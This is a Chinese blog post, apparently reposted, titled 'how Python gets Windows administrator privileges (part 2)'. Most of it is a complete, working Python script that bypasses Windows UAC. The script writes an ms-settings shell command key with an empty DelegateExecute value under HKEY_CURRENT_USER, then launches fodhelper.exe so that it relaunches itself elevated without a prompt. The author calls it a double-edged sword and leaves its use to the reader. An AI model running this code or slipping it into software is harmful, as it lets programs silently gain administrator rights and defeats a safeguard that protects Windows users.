python如果获取windows管理员权限(二)

coordinate_blog 2018-01-08 20:14:21 24297 收藏 11 分类专栏: Security 版权 我们在python如果获取windows管理员权限(一)中谈到了UAC的问题。

很多时候我们不希望我们的软件弹出UAC提示,这个时候我们可以通过注册表的方法去解决。这其实已经不在是一个安全的编程了,它变成了一把双刃剑。

当然我们只是讨论这种问题该怎么解决。具体用在什么方面那是你的问题咯!

通过下面的代码我们可以轻松绕过UAC

# -*- coding: utf-8 -*-
"""
Created on Mon Jan 8 09:09:51 2018

@author: coordinate
"""
from __future__ import print_function
import os
import sys
import ctypes
if sys.version_info[0] == 3:
   import winreg as winreg
else:
   import _winreg as winreg
   
CMD                   = r"C:\Windows\System32\cmd.exe"
FOD_HELPER           = r'C:\Windows\System32\fodhelper.exe'
PYTHON_CMD           = "python"
REG_PATH             = 'Software\Classes\ms-settings\shell\open\command'
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'

def is_admin():
   '''
  Checks if the script is running with administrative privileges.
  Returns True if is running as admin, False otherwise.
  '''    
   try:
       return ctypes.windll.shell32.IsUserAnAdmin()
   except:
       return False
   
def create_reg_key(key, value):
   '''
  Creates a reg key
  '''
   try:        
       winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH)
       registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_WRITE)                
       winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value)        
       winreg.CloseKey(registry_key)
   except WindowsError:        
       raise
       
def bypass_uac(cmd):
   '''
  Tries to bypass the UAC
  '''
   try:
       create_reg_key(DELEGATE_EXEC_REG_KEY, '')
       create_reg_key(None, cmd)    
   except WindowsError:
       raise
       
def execute():        
   if not is_admin():
       print('[!] The script is NOT running with administrative privileges')
       print('[+] Trying to bypass the UAC')
       try:                
           current_dir = __file__
           cmd = '{} /k {} {}'.format(CMD, PYTHON_CMD, current_dir)
           bypass_uac(cmd)                
           os.system(FOD_HELPER)                
           sys.exit(0)                
       except WindowsError:
           sys.exit(1)
   else:
       #这里添加我们需要管理员权限的代码
       print('[+] The script is running with administrative privileges!')  
       
if __name__ == '__main__':
   execute()

其实我们这个代码这里主要是往注册表中添加了这两项

posted on 2022-08-10 08:39  root-123  阅读(119)  评论(0编辑  收藏  举报